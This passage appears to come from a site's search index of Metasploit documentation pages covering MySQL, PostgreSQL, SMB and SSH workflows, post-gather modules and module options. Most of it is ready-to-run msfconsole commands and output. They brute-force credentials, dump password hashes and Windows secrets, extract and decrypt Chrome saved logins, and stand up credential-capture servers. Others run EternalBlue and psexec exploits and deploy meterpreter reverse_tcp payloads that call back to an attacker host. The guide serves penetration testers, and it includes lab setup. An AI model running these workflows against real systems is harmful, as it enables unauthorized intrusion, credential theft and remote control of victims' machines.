127.0.0.1:4306 - 127.0.0.1:4306 - Found remote MySQL version 11.2.2 [+] 127.0.0.1:4306 - 127.0.0.1:4306 - Success: 'root:password' [*] MySQL session 1 opened (127.0.0.1:53241 -&amp;gt; 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500 [*] 127.0.0.1:4306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... mysql @ 127.0.0.1:4306 &amp;gt; . You can interact with your new session using sessions -i -1 or sessions &amp;lt;session id&amp;gt;. You can also use help to get more information about how to use your session. msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 mssql MSSQL test @ 192.168.2.242:1433 192.168.2.1:61428 -&amp;gt; 192.168.2.242:1433 (192.168.2.242) 3 mysql MySQL root @ 127.0.0.1:4306 127.0.0.1:61450 -&amp;gt; 127.0.0.1:4306 (127.0.0.1) msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; sessions -i 3 [*] Starting interaction with 3... When interacting with a session, the help command can be useful: . mysql @ 127.0.0.1:4306 &amp;gt; help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session MySQL Client Commands ===================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/mysql/mysql_enum auxiliary/admin/mysql/mysql_sql auxiliary/scanner/mysql/mysql_file_enum auxiliary/scanner/mysql/mysql_hashdump auxiliary/scanner/mysql/mysql_schemadump auxiliary/scanner/mysql/mysql_version auxiliary/scanner/mysql/mysql_writable_dirs exploit/multi/mysql/mysql_udf_payload exploit/windows/mysql/mysql_mof exploit/windows/mysql/mysql_start_up . Once you’ve done that, you can run any MySQL query against the target using the query command: . mysql @ 127.0.0.1:4306 &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. -i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query SHOW DATABASES; query USE information_schema; query SELECT * FROM SQL_FUNCTIONS; query SELECT version(); mysql @ 127.0.0.1:4306 &amp;gt; query 'SELECT version();' Response ======== # version() - --------- 0 11.2.2-MariaDB-1:11.2.2+maria~ubu2204 . Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . mysql @ 127.0.0.1:4306 () &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. mysql @ 127.0.0.1:4306 () &amp;gt; query_interactive [*] Starting interactive SQL shell for mysql @ 127.0.0.1:4306 () [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; SELECT table_name SQL *&amp;gt; FROM information_schema.tables SQL *&amp;gt; LIMIT 2; [*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2; Response ======== # table_name - ---------- 0 ALL_PLUGINS 1 APPLICABLE_ROLES SQL &amp;gt;&amp;gt; . MySQL Dumping . User and hash dump: . use auxiliary/scanner/mysql/mysql_hashdump run 'mysql://root: a b c [email protected]' . Schema dump: . use auxiliary/scanner/mysql/mysql_schemadump run 'mysql://root: a b c [email protected]' . MySQL Querying . Execute raw SQL: . use admin/mysql/mysql_sql run 'mysql://root: a b c [email protected]' sql='select version()' . MySQL Reverse Shell . This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=&amp;lt; 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. For this to work successfully: . | secure_file_priv, a mysql setting, must be changed from the default to allow writing to MySQL’s plugins folder | On Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled. Equivalents on other linux systems most likely need the same | The MySQL plugin folder must be writable | . NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. Usage: . use multi/mysql/mysql_udf_payload run 'mysql://root: a b c [email protected]' lhost=192.168.123.1 target=Linux payload=linux/x86/meterpreter/reverse_tcp . ",
    "url": "/docs/pentesting/metasploit-guide-mysql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-mysql.html"
  },"576": {
    "doc": "Post Gather Modules",
    "title": "Post Modules",
    "content": "Metasploit’s post gather modules are useful after a Metasploit session has opened. This guide focuses on Post modules for gathering additional information from a host after a Metasploit session has opened. Metasploit post modules replace old Meterpreter scripts, which are no longer maintained or accepted by the framework team. You can search for post gather modules within msfconsole: . msf6 &amp;gt; search type:post platform:windows name:gather Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/windows/gather/ad_to_sqlite normal No AD Computer, Group and Recursive User Membership to Local SQLite DB 1 post/windows/gather/credentials/aim normal No Aim credential gatherer ... etc .. Usage . There are two ways to launch a Post module, both require an existing session. Within a msf prompt you can use the use command followed by the run command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session: . msf6 &amp;gt; use post/windows/gather/enum_chrome msf6 post(windows/gather/enum_chrome) &amp;gt; run session=-1 verbose=true [*] Impersonating token: 7192 [*] Running as user 'DESKTOP-N3MAG5R\\basic_user'... [*] Extracting data for user 'basic_user'... [+] Downloaded Web Data to '/Users/user/.msf4/loot/20220422122125_default_192.168.123.151_chrome.raw.WebD_560928.txt' [-] Cookies not found [+] Downloaded History to '/Users/user/.msf4/loot/20220422122126_default_192.168.123.151_chrome.raw.Histo_861946.txt' [+] Downloaded Login Data to '/Users/user/.msf4/loot/20220422122126_default_192.168.123.151_chrome.raw.Login_785667.txt' [+] Downloaded Bookmarks to '/Users/user/.msf4/loot/20220422122127_default_192.168.123.151_chrome.raw.Bookm_612993.txt' [+] Downloaded Preferences to '/Users/user/.msf4/loot/20220422122127_default_192.168.123.151_chrome.raw.Prefe_893631.txt' [*] Found password encrypted with masterkey [+] Found masterkey! [+] Decrypted data: url:http://192.168.123.6/ helloworld:157746edfe6b4d369d7e656c00eeb5c8 [+] Decrypted data: url:https://www.example.com/ my_username:my_password_123 [+] Decrypted data saved in: /Users/user/.msf4/loot/20220422122129_default_192.168.123.151_chrome.decrypted_981698.txt [*] Post module execution completed msf6 post(windows/gather/enum_chrome) &amp;gt; . Or within a Meterpreter prompt use the run command, which will automatically set the module’s session value: . msf6 &amp;gt; sessions --interact -1 [*] Starting interaction with 5... meterpreter &amp;gt; run post/windows/gather/enum_applications [*] Enumerating applications installed on DESKTOP-N3MAG5R Installed Applications ====================== Name Version ---- ------- 7-Zip 21.07 (x64) 21.07 Application Verifier x64 External Package 10.1.19041.685 ClickOnce Bootstrapper Package for Microsoft .NET Framework 4.8.04162 DiagnosticsHub_CollectionService 16.1.28901 Docker Desktop 2.2.0.4 ... etc .. ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html#post-modules",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html#post-modules"
  },"577": {
    "doc": "Post Gather Modules",
    "title": "Useful modules",
    "content": "Windows GPP Credentials . This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked . use post/windows/gather/credentials/gpp run session=-1 . ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html#useful-modules",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html#useful-modules"
  },"578": {
    "doc": "Post Gather Modules",
    "title": "Post Gather Modules",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-post-gather-modules.html",
    "relUrl": "/docs/pentesting/metasploit-guide-post-gather-modules.html"
  },"579": {
    "doc": "PostgreSQL",
    "title": "PostgreSQL Workflows",
    "content": "PostgreSQL, sometimes aliased as Postgres, is frequently found on port 5432/TCP. It is an open-source relational database management system. Metasploit has support for multiple PostgreSQL modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Dumping database information | Capture server | Executing arbitrary SQL queries against the database | Gaining reverse shells | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search postgres . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:postgres . Lab Environment . When testing in a lab environment PostgreSQL can either be installed on the host machine or within Docker: . docker run -it --rm --publish 127.0.0.1:5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine . PostgreSQL Enumeration . Enumerate version: . use auxiliary/scanner/postgres/postgres_version run postgres://192.168.123.13 run postgres://postgres:[email protected] . PostgreSQL Login / Bruteforce . If you have PostgreSQL credentials to validate: . use auxiliary/scanner/postgres/postgres_login run 'postgres://root: a b c [email protected]' . Re-using PostgreSQL credentials in a subnet: . use auxiliary/scanner/postgres/postgres_login run cidr:/24:myspostgresl://user:[email protected] threads=50 . Using an alternative port: . use auxiliary/scanner/postgres/postgres_login run postgres://user:[email protected]:2222 . Brute-force host with known user and password list: . use auxiliary/scanner/postgres/postgres_login run postgres://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use auxiliary/scanner/postgres/postgres_login run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use auxiliary/scanner/postgres/postgres_login run cidr:/24:postgres://user:[email protected] threads=50 run cidr:/24:postgres://[email protected] threads=50 pass_file=./wordlist.txt . Obtaining an Interactive Session . The CreateSession option for auxiliary/scanner/postgres/postgres_login allows you to obtain an interactive session for the Postgres client you’re connecting to. The run command with CreateSession set to true should give you an interactive session. For example: . msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true . Should yield: . [+] 127.0.0.1:5432 - Login Successful: postgres:password@template1 [*] PostgreSQL session 1 opened (127.0.0.1:61324 -&amp;gt; 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . You can interact with your session using sessions -i -1 or sessions &amp;lt;session id&amp;gt;. Use the help command for more info. msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 postgresql PostgreSQL postgres @ 127.0.0.1:5432 127.0.0.1:61324 -&amp;gt; 127.0.0.1:5432 (127.0.0.1) msf6 auxiliary(scanner/postgres/postgres_login) &amp;gt; sessions -i 1 [*] Starting interaction with 1... When interacting with a session, the help command can be useful: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session PostgreSQL Client Commands ========================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/postgres/postgres_readfile auxiliary/admin/postgres/postgres_sql auxiliary/scanner/postgres/postgres_hashdump auxiliary/scanner/postgres/postgres_schemadump auxiliary/scanner/postgres/postgres_version exploit/linux/postgres/postgres_payload exploit/multi/postgres/postgres_copy_from_program_cmd_exec exploit/multi/postgres/postgres_createlang exploit/windows/postgres/postgres_payload . Once you’ve done that, you can run any Postgres query against the target using the query command: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. -i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query SELECT user; query SELECT version(); query SELECT * FROM pg_catalog.pg_tables; postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query 'SELECT version();' [*] SELECT 1 Response ======== # version - ------- 0 PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit . Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. postgresql @ 127.0.0.1:5432 (template1) &amp;gt; query_interactive [*] Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1) [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; SELECT table_name SQL *&amp;gt; FROM information_schema.tables SQL *&amp;gt; LIMIT 2; [*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2; [*] SELECT 2 Response ======== # table_name - ---------- 0 pg_statistic 1 pg_type SQL &amp;gt;&amp;gt; . PostgreSQL Capture Server . Captures and log PostgreSQL credentials: . use auxiliary/server/capture/postgresql run . For example, if a client connects with: . psql postgres://postgres:mysecretpassword@localhost:5432 . Metasploit’s output will be: . msf6 auxiliary(server/capture/postgresql) &amp;gt; [*] Started service listener on 0.0.0.0:5432 [*] Server started. [+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres . PostgreSQL Dumping . User and hash dump: . use auxiliary/scanner/postgres/postgres_hashdump run postgres://postgres:[email protected] run postgres://postgres:[email protected]/database_name . Schema dump: . use auxiliary/scanner/postgres/postgres_schemadump run postgres://postgres:[email protected] run postgres://postgres:[email protected] ignored_databases=template1,template0,postgres . PostgreSQL Querying . use auxiliary/admin/postgres/postgres_sql run 'postgres://user:this is my [email protected]/database_name' sql='select version()' . PostgreSQL Reverse Shell . use exploit/linux/postgres/postgres_payload run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\\ x86_64' . ",
    "url": "/docs/pentesting/metasploit-guide-postgresql.html#postgresql-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-postgresql.html#postgresql-workflows"
  },"580": {
    "doc": "PostgreSQL",
    "title": "PostgreSQL",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-postgresql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-postgresql.html"
  },"581": {
    "doc": "Setting Module Options",
    "title": "Module options",
    "content": "Each Metasploit module has a set of options which must be set before running. These can be seen with the show options or options command: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as ... etc ... Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.239 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target . Each Metasploit module also has advanced options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; advanced Module advanced options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port CheckModule auxiliary/scanner/smb/smb_ms17_010 yes Module to check with ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection ... etc ... Payload advanced options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadStdapi true yes Automatically load the Stdapi extension AutoRunScript no A script to run automatically on session creation. AutoSystemInfo true yes Automatically capture system information on ... etc ... You can see which options stilloptions to be set with the show missing command: . msf6 exploit(windows/smb/ms17_010_eternalblue) &amp;gt; show missing Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html . Setting options . Traditional usage of Metasploit involves loading a module, and setting multiple options individually: . use exploit/linux/postgres/postgres_payload set username administrator set password pass set rhost 192.168.123.6 set rport 5432 set database postgres set lhost 192.168.123.1 set lport 5000 run . You can also specify multiple RHOSTS separated by spaces or with a CIDR subnet mask: . set rhosts 127.0.0.1 127.0.0.2 set rhosts 127.0.0.1/24 . In 2021 support for running a module and specifying module options at the same time was added, dubbed inline option support. This workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console, but it will also make it easier to share cheat sheets amongst pentesters. Example: . use exploit/linux/postgres/postgres_payload run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\\ x86_64' verbose=true . You can set complex options using quotes. Example: . set COMMAND \"date --date='TZ=\\\"America/Los_Angeles\\\" 09:00 next Fri' --iso-8601=ns\" . URI support for RHOSTS . Metasploit also supports the use of URI strings as arguments, which allows setting multiple options at once - i.e. username, password, rport, rhost, etc. use exploit/linux/postgres/postgres_payload run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000 . The following protocols are currently supported, and described in more detail below: . | cidr - Can be combined with other protocols to specify address subnet mask length | file - Load a series of RHOST values separated by newlines from a file. This file can also include URI strings | http | https | mysql | postgres | smb | ssh | . To preserve whitespace, regardless of the protocol, use quotes: . use auxiliary/admin/postgres/postgres_sql run 'postgres://user:this is my [email protected]/database_name' sql='select version()' . In some scenarios it may be too troublesome to escape quotes within a password. In this scenario it is possible to still set the password option manually and use the URI argument without a password specified, the module will gracefully fallback to using the manually set password: . set password !@£$%^&amp;amp;*()\"' run smb://[email protected] . You can also specify multiple RHOST arguments, as well as provide additionally inlined options: . use scanner/smb/smb_enumshares run smb://test:[email protected] smb://user:[email protected] smb://test:[email protected] verbose=true . ",
    "url": "/docs/pentesting/metasploit-guide-setting-module-options.html#module-options",
    "relUrl": "/docs/pentesting/metasploit-guide-setting-module-options.html#module-options"
  },"582": {
    "doc": "Setting Module Options",
    "title": "Setting Module Options",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-setting-module-options.html",
    "relUrl": "/docs/pentesting/metasploit-guide-setting-module-options.html"
  },"583": {
    "doc": "SMB",
    "title": "SMB Workflows",
    "content": "SMB (Server Message Blocks), is a way for sharing files across nodes on a network. There are two main ports for SMB: . | 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network | 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used. | . Other terminology to be aware of: . | SMB - Server Message Blocks | CIFS - Common Internet File System | Samba - A free software re-implementation of SMB, which is frequently found on unix-like systems | . Metasploit has support for multiple SMB modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Capture modules | Relay modules | File transfer | Exploit modules | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search smb . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:smb . Lab Environment . When testing in a lab environment - SMB can be used on a Window’s host machine, or within Docker. For instance running Samba on Ubuntu 16.04: . docker run -it --rm --publish 127.0.0.1:139:139 --publish 127.0.0.1:445:445 ubuntu:16.04 /bin/bash mkdir -p /tmp/foo apt update apt install -y samba . Verifying version is as expected: . $ samba --version Version 4.3.11-Ubuntu . Configuring the share: . cat &amp;lt;&amp;lt; EOF &amp;gt;&amp;gt; /etc/samba/smb.conf [foo_share] comment = Foo samba share path = /tmp/foo read only = no browsable = yes EOF . Restart the service: . service smbd restart . SMB Login and Interactive Sessions . When using the smb_login module, the CreateSession option can be used to obtain an interactive session within the smb instance. Running with the following options: . msf6 auxiliary(scanner/smb/smb_login) &amp;gt; run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username . Should give you output similar to . [*] 172.14.2.164:445 - 172.14.2.164:445 - Starting SMB login bruteforce [+] 172.14.2.164:445 - 172.14.2.164:445 - Success: 'windomain.local\\username:password' Administrator [*] SMB session 1 opened (172.16.158.1:62793 -&amp;gt; 172.14.2.164:445) at 2024-03-12 17:03:09 +0000 [*] 172.14.2.164:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Which you can interact with using sessions -i &amp;lt;session id&amp;gt; or sessions -i -1 to interact with the most recently opened session. msf6 auxiliary(scanner/smb/smb_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... SMB (172.14.2.164) &amp;gt; shares Shares ====== # Name Type comment - ---- ---- ------- 0 ADMIN$ DISK|SPECIAL Remote Admin 1 C$ DISK|SPECIAL Default share 2 foo DISK 3 IPC$ IPC|SPECIAL Remote IPC SMB (172.14.2.164) &amp;gt; shares -i foo [+] Successfully connected to foo SMB (172.14.2.164\\foo) &amp;gt; ls ls === [truncated] . When interacting with a session, the help command can be useful: . SMB (172.14.2.164\\foo) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background exit Terminate the SMB session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session Shares Commands =============== Command Description ------- ----------- cat Read the file at the given path cd Change the current remote working directory delete Delete a file dir List all files in the current directory (alias for ls) download Download a file ls List all files in the current directory mkdir Make a new directory pwd Print the current remote working directory rmdir Delete a directory shares View the available shares and interact with one upload Upload a file Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/dcerpc/icpr_cert auxiliary/admin/dcerpc/samr_computer auxiliary/admin/smb/delete_file auxiliary/admin/smb/download_file auxiliary/admin/smb/psexec_ntdsgrab auxiliary/admin/smb/upload_file auxiliary/gather/windows_secrets_dump auxiliary/scanner/smb/pipe_auditor auxiliary/scanner/smb/pipe_dcerpc_auditor auxiliary/scanner/smb/smb_enum_gpp auxiliary/scanner/smb/smb_enumshares auxiliary/scanner/smb/smb_enumusers auxiliary/scanner/smb/smb_enumusers_domain auxiliary/scanner/smb/smb_lookupsid exploit/windows/smb/psexec . SMB Enumeration . Enumerate SMB version: . use auxiliary/scanner/smb/smb_version run smb://10.10.10.161 . Enumerate shares: . use auxiliary/scanner/smb/smb_enumshares run smb://10.10.10.161 run smb://user:[email protected] run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1 . Enumerate shares and show all files recursively: . use auxiliary/scanner/smb/smb_enumshares run 'smb://user:pass with a [email protected]' showfiles=true spidershares=true . Enumerate users: . use auxiliary/scanner/smb/smb_enumusers run smb://user:[email protected] . Enumerate gpp files in a SMB share: . use auxiliary/scanner/smb/smb_enum_gpp run smb://192.168.123.13/share_name verbose=true store=true run smb://user:[email protected]/share_name verbose=true store=true . SMB Server . Create a mock SMB server which accepts credentials before returning NT_STATUS_LOGON_FAILURE. These hashes can then be cracked later: . use auxiliary/server/capture/smb run . SMB MS17-010 . Metasploit has a module for MS17-010, dubbed Eternal Blue, which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. Checking for exploitability: . use auxiliary/scanner/smb/smb_ms17_010 check 10.10.10.23 check 10.10.10.0/24 check smb://user:[email protected]/ check smb://domain;user:[email protected]/ check cidr:/24:smb://user:[email protected] threads=32 . As of 2021, Metasploit supports a single exploit module for which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10, full details within the Metasploit Wrapup: . use exploit/windows/smb/ms17_010_eternalblue run 10.10.10.23 lhost=192.168.123.1 run 10.10.10.0/24 lhost=192.168.123.1 lport=5000 run smb://user:[email protected]/ lhost=192.168.123.1 run smb://domain;user:[email protected]/ lhost=192.168.123.1 . SMB psexec . Running psexec against a remote host with credentials: . use exploit/windows/smb/psexec run smb://user:[email protected] lhost=192.168.123.1 lport=5000 . Running psexec with NTLM hashes: . use exploit/windows/smb/psexec run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000 . SMB Dumping . Dumping secrets with credentials: . use auxiliary/gather/windows_secrets_dump run smb://user:[email protected] . Dumping secrets with NTLM hashes . use auxiliary/gather/windows_secrets_dump run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] . SMB Files . Download a file: . use auxiliary/admin/smb/download_file run smb://a:[email protected]/my_share/helloworld.txt . Upload a file: . use auxiliary/admin/smb/upload_file echo \"my file\" &amp;gt; local_file.txt run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Running psexec against a host: . msf6 &amp;gt; use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.123.13:445 - Connecting to the server... [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'... [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response [*] 192.168.123.13:445 - Selecting PowerShell target [*] 192.168.123.13:445 - Executing the payload... [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.123.13 [*] Meterpreter session 6 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000 meterpreter &amp;gt; . ",
    "url": "/docs/pentesting/metasploit-guide-smb.html#smb-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-smb.html#smb-workflows"
  },"584": {
    "doc": "SMB",
    "title": "SMB",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-smb.html",
    "relUrl": "/docs/pentesting/metasploit-guide-smb.html"
  },"585": {
    "doc": "SSH",
    "title": "SSH Workflows",
    "content": "SSH, also known as Secure Shell or Secure Socket Shell, is frequently found on port 22/TCP. The protocol allows for SSH clients to securely connect to a running SSH server to execute commands against, the protocol also supports tunneling network traffic - which Metasploit can leverage for pivoting purposes. Metasploit has support for multiple SSH modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Opening sessions | Pivoting support | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search ssh . Lab Environment . There are multiple SSH servers to choose from and install on a host machine, including: . | OpenSSH - OpenBSD Secure Shell, most popular | Dropbear | . It is also possible to use Docker. First create a new Dockerfile: . FROM alpine:latest RUN apk add --update RUN apk --no-cache add openssh RUN ssh-keygen -A RUN echo 'root:toor' | chpasswd RUN echo $' AuthorizedKeysFile .ssh/authorized_keys\\n\\ GatewayPorts no \\n\\ X11Forwarding no \\n\\ Subsystem sftp /usr/lib/ssh/sftp-server \\n\\ PasswordAuthentication yes \\n\\ AllowTcpForwarding yes \\n\\ PasswordAuthentication yes \\n\\ AllowTcpForwarding yes' &amp;gt; /etc/ssh/sshd_config RUN echo \"KexAlgorithms diffie-hellman-group1-sha1\" &amp;gt;&amp;gt; /etc/ssh/sshd_config RUN addgroup -g 700 test_user \\ &amp;amp;&amp;amp; adduser -G test_user -D -u 700 -S -h /home/test_user -s /bin/sh test_user RUN echo -n 'test_user:password123' | chpasswd EXPOSE 22 CMD [\"/usr/sbin/sshd\",\"-D\"] . Build and run: . docker build --tag ssh_lab:latest - &amp;lt; Dockerfile docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest . It should now be possible to test the SSH login from msfconsole: . msf6 &amp;gt; use scanner/ssh/ssh_login msf6 auxiliary(scanner/ssh/ssh_login) &amp;gt; run ssh://test_user:[email protected]:2222 [*] 127.0.0.1:2222 - Starting bruteforce [+] 127.0.0.1:2222 - Success: 'test_user:password123' 'uid=700(test_user) gid=700(test_user) groups=700(test_user),700(test_user) Linux 5a26fe63abef 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 Linux ' [*] SSH session 1 opened (127.0.0.1:57318 -&amp;gt; 127.0.0.1:2222 ) at 2022-04-23 01:25:01 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . Note that TCP forwarding requires the AllowTcpForwarding option to be enabled in the server’s configuration file, which is often the default. If the option is disabled or the more specific PermitOpen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. SSH Enumeration . Enumerate SSH version: . use auxiliary/scanner/ssh/ssh_version run ssh://127.0.0.1 . SSH Bruteforce . Brute-force host with known user and password list: . use 